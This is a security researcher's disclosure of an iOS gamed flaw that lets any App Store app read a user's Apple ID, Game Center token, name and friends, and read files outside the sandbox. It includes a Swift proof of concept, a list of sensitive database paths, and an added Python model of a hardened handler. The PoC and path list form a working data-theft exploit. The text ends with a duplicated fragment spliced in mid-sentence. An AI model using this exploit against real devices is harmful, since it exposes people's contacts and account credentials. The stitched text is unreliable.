iOS gamed exploit (fixed in 15.0.2)
Update: Apple has quietly fixed this in iOS 15.0.2 without any kind of public acknowledgement or credit.
Any app installed from the App Store may access the following data without any prompt from the user:
- the user's Apple ID (account name), DSID and Game Center authentication token
- the first and last name associated with the user's Apple ID
- the user's Game Center friends
- arbitrary files outside of the app sandbox, including the complete Address Book database, the CoreDuet interactions database and the speed dial (favorite contacts) list
Here is a short proof of concept.
```swift
import Foundation

// GKDaemonProtocol and the service protocols it hands back are private GameKit XPC
// interfaces; their Objective-C declarations (e.g. in a bridging header) are not shown here.
let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
connection.remoteObjectInterface = NSXPCInterface(with: GKDaemonProtocol.self)
connection.resume()

let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier

// gamed returns the service proxies without checking the caller's entitlement
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
    // Apple ID and Game Center token of the signed-in user
    accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
        let appleID = response.credential.accountName
        let token = response.credential.authenticationToken
    })
    // Arbitrary file read outside the sandbox: any file URL is accepted
    utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
        let addressBookData = data
    })
})
```
How it happens:
- com.apple.gamed doesn't properly check for the com.apple.developer.game-center entitlement.
- getServicesForPID:localPlayer:reply: returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, etc.).
- Even if the app doesn't have the com.apple.developer.game-center entitlement, invoking authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing the user's Apple ID, DSID and Game Center authentication token (which allows sending requests to https://gc.apple.com on behalf of the user). Invoking getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing the first and last name of the user's Apple ID. Invoking getFriendsForPlayer:handler: on GKFriendService returns an object with information about the user's friends in Game Center.
- Even if the app doesn't have the com.apple.developer.game-center entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService allows reading arbitrary files outside of the app sandbox by passing file URLs to that method. Among the files (but not limited to) that can be accessed that way are the following:
  /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist - contains the MobileGestalt cache
  /var/mobile/Library/CoreDuet/People/interactionC.db - contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about the user's interaction with these contacts (including timestamps and statistics)
  /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist - contains favorite contacts and their phone numbers
  /var/mobile/Library/AddressBook/AddressBook.sqlitedb - contains the complete Address Book database
  /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb - contains photos of Address Book contacts
- cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService might allow writing arbitrary data to a location outside of the app sandbox.
On the Apple Security Bounty Program page this vulnerability is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. "Sensitive data" access includes gaining broad access (i.e., the full database) from Contacts).
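The two defects in the "How it happens" section (no entitlement check on the caller, and a client-supplied file URL passed straight through to a privileged file read) are modelled below as an added example; this is not Apple's gamed code and does not use its real interfaces. The Client type, the handler names and the temporary directory layout are assumptions standing in for the XPC peer and the real iOS paths. The vulnerable handler reproduces the behaviour the post describes; the hardened one requires the entitlement, accepts only local file URLs, canonicalises the path and refuses anything outside the daemon's own cache directory, including a symlink planted inside it.

```python
import os
import tempfile
from dataclasses import dataclass, field
from urllib.parse import unquote, urlparse

# Entitlement gamed should require before handing out service proxies (named in the post).
GAME_CENTER_ENTITLEMENT = "com.apple.developer.game-center"


@dataclass
class Client:
    """Assumed stand-in for the XPC peer. A real daemon must derive entitlements from the
    connection's audit token (kernel-verified), never from data the client sends."""
    pid: int
    entitlements: dict = field(default_factory=dict)


class ServiceError(Exception):
    """Raised by the hardened handler when a request is refused."""


def vulnerable_request_image_data(client: Client, url: str, cache_root: str) -> bytes:
    """Models the flawed behaviour: no entitlement check, and the URL's path is opened
    as-is, so any file the daemon itself can read is returned to the caller."""
    path = unquote(urlparse(url).path)
    with open(path, "rb") as f:
        return f.read()


def hardened_request_image_data(client: Client, url: str, cache_root: str) -> bytes:
    """Same operation with the checks the service should perform."""
    # 1. The caller must hold the entitlement; refuse before touching the filesystem.
    if client.entitlements.get(GAME_CENTER_ENTITLEMENT) is not True:
        raise ServiceError("missing entitlement")
    # 2. Only local file URLs make sense for an image cache lookup.
    parts = urlparse(url)
    if parts.scheme != "file" or parts.netloc not in ("", "localhost"):
        raise ServiceError("only local file URLs are accepted")
    # 3. Canonicalise both sides (resolves '..' and symlinks) and require containment.
    root = os.path.realpath(cache_root)
    target = os.path.realpath(unquote(parts.path))
    if os.path.commonpath([root, target]) != root:
        raise ServiceError("path escapes cache directory")
    if not os.path.isfile(target):
        raise ServiceError("not a regular file")
    # 4. Open the already-resolved path without following a symlink swapped in after the check.
    fd = os.open(target, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "rb") as f:
        return f.read()


def demo() -> dict:
    """Constructed layout in a temp dir (stand-ins for the real iOS paths): the daemon's
    image cache, a 'database' outside it, and a symlink planted inside the cache."""
    base = tempfile.mkdtemp()
    cache = os.path.join(base, "GameKit", "ImageCache")
    os.makedirs(cache)
    database = os.path.join(base, "AddressBook.sqlitedb")      # outside the cache
    with open(database, "wb") as f:
        f.write(b"SQLite format 3\x00 constructed contact rows")
    avatar = os.path.join(cache, "avatar.png")                  # legitimate cached image
    with open(avatar, "wb") as f:
        f.write(b"\x89PNG constructed image bytes")
    planted = os.path.join(cache, "planted.png")                # symlink -> database
    os.symlink(database, planted)

    entitled = Client(pid=1, entitlements={GAME_CENTER_ENTITLEMENT: True})
    unentitled = Client(pid=2)
    traversal = os.path.join(cache, "..", "..", "AddressBook.sqlitedb")

    results = {"vulnerable_leak": vulnerable_request_image_data(unentitled, "file://" + database, cache)}
    attempts = {
        "unentitled": (unentitled, "file://" + avatar),
        "traversal": (entitled, "file://" + traversal),
        "symlink": (entitled, "file://" + planted),
        "wrong_scheme": (entitled, "https://gc.apple.com/avatar.png"),
    }
    for name, (client, url) in attempts.items():
        try:
            hardened_request_image_data(client, url, cache)
            results[name] = "allowed"
        except ServiceError as err:
            results[name] = str(err)
    results["legitimate"] = hardened_request_image_data(entitled, "file://" + avatar, cache)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running demo() shows the unentitled caller pulling the whole "database" through the vulnerable handler, while the hardened handler refuses the same caller outright and refuses the entitled caller's traversal, symlink and non-file URLs, serving only the image that really lives in the cache. The order of the checks matters: the entitlement is verified before any path is resolved, so an unentitled client cannot even probe which paths exist.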
on GKUtilityService might allow to write arbitrary data to a location outside of the app sandbox.On the Apple Security Bounty Program page this vulnerabilty is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).